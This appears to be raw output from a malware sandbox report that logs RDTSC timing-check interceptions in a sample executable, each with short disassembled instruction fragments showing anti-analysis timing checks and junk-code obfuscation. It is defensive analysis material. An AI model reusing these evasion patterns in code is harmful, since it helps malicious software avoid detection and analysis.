Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 977643 second address: 977648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97A314 second address: 97A32B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jne 00007FE5B8F4A746h 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97A531 second address: 97A536 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97C4A3 second address: 97C530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A756h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jmp 00007FE5B8F4A74Ah 0x00000011 nop 0x00000012 or dword ptr [ebp+122DB6D9h], edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FE5B8F4A748h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 jne 00007FE5B8F4A749h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007FE5B8F4A748h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 adc bx, AF41h 0x0000005b xchg eax, esi 0x0000005c push edi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97C530 second address: 97C543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE5B8D9CB56h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97A5E7 second address: 97A605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A757h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97A605 second address: 97A613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97D486 second address: 97D48B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97D48B second address: 97D499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97B553 second address: 97B5E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE5B8F4A751h 0x0000000b popad 0x0000000c nop 0x0000000d or ebx, dword ptr [ebp+122D343Bh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jnp 00007FE5B8F4A765h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov dword ptr [ebp+122D2C4Ah], edx 0x0000002d mov eax, dword ptr [ebp+122D0CA1h] 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FE5B8F4A748h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d mov di, 8C4Fh 0x00000051 push FFFFFFFFh 0x00000053 sbb bx, A846h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d js 00007FE5B8F4A746h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97D499 second address: 97D49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97B5E4 second address: 97B5F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97D49D second address: 97D4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97B5F3 second address: 97B5FD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A74Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97D4A3 second address: 97D4AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97E364 second address: 97E3B7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE5B8F4A748h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push edi 0x00000010 pushad 0x00000011 movzx ebx, dx 0x00000014 mov edx, ebx 0x00000016 popad 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FE5B8F4A748h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jns 00007FE5B8F4A74Ch 0x0000003a push 00000000h 0x0000003c xor ebx, dword ptr [ebp+122D2885h] 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push edi 0x00000046 pushad 0x00000047 popad 0x00000048 pop edi 0x00000049 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97E3B7 second address: 97E3DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FE5B8D9CB56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97E3DB second address: 97E3DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98043A second address: 980444 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE5B8D9CB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97F544 second address: 97F54E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 981350 second address: 9813B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D289Dh] 0x00000012 push 00000000h 0x00000014 jmp 00007FE5B8D9CB67h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FE5B8D9CB58h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FE5B8D9CB65h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98388A second address: 98390A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A753h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE5B8F4A758h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FE5B8F4A74Dh 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FE5B8F4A748h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D2EF7h], ebx 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+122D1F46h], ecx 0x0000003e push 00000000h 0x00000040 xor ebx, dword ptr [ebp+122D2829h] 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98390A second address: 98390E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98390E second address: 983914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 983B35 second address: 983B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 983B3E second address: 983BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE5B8F4A746h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d or dword ptr [ebp+124759A3h], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jmp 00007FE5B8F4A74Dh 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 add ebx, dword ptr [ebp+122D2AA1h] 0x0000002c mov eax, dword ptr [ebp+122D12E9h] 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007FE5B8F4A748h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov dword ptr [ebp+1244D562h], edi 0x00000052 push FFFFFFFFh 0x00000054 mov di, CC59h 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c jmp 00007FE5B8F4A752h 0x00000061 pop esi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 983BBE second address: 983BC3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 985B73 second address: 985B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98BA46 second address: 98BA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8D9CB62h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98BA5F second address: 98BA90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A757h 0x00000007 jmp 00007FE5B8F4A752h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 92665C second address: 926660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98B310 second address: 98B316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98B316 second address: 98B321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 98B321 second address: 98B33E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FE5B8F4A746h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99000F second address: 990014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 990014 second address: 99003C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE5B8F4A748h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FE5B8F4A755h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99003C second address: 990057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 990057 second address: 990093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A750h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007FE5B8F4A74Ch 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jp 00007FE5B8F4A74Ah 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 990093 second address: 99009D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 992177 second address: 992185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE5B8F4A746h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 992185 second address: 99218C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99218C second address: 99219B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FE5B8F4A746h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 997284 second address: 99728A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 995F92 second address: 995F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 995F98 second address: 995FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FE5B8D9CB5Ch 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99659F second address: 9965A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9965A5 second address: 9965B5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9965B5 second address: 9965BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99689A second address: 9968AC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FE5B8D9CB56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 996CE6 second address: 996CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007FE5B8F4A74Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 996CFB second address: 996CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99714C second address: 997156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE5B8F4A746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99B703 second address: 99B709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99B709 second address: 99B721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A754h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99B85C second address: 99B860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99B860 second address: 99B86A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99B86A second address: 99B870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99B870 second address: 99B876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99B876 second address: 99B87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99C108 second address: 99C119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007FE5B8F4A74Ah 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99C119 second address: 99C123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE5B8D9CB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 99C123 second address: 99C13A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A750h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A2397 second address: 9A23B2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE5B8D9CB61h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A23B2 second address: 9A23B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A23B7 second address: 9A23BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 926633 second address: 926639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 926639 second address: 92665C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB5Dh 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jc 00007FE5B8D9CB56h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A0D6D second address: 9A0D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A756h 0x00000009 jl 00007FE5B8F4A746h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A0D8D second address: 9A0DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE5B8D9CB60h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A1097 second address: 9A10C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE5B8F4A74Ch 0x0000000f jmp 00007FE5B8F4A753h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A10C0 second address: 9A10D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FE5B8D9CB5Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A1368 second address: 9A1370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A14DA second address: 9A14E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A1795 second address: 9A17B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FE5B8F4A74Eh 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007FE5B8F4A746h 0x00000013 jg 00007FE5B8F4A75Ah 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A193E second address: 9A1951 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8D9CB5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A1D54 second address: 9A1D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 94D01B second address: 94D033 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE5B8D9CB5Eh 0x00000008 jc 00007FE5B8D9CB5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A8ECE second address: 9A8EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE5B8F4A74Dh 0x0000000a rdtsc
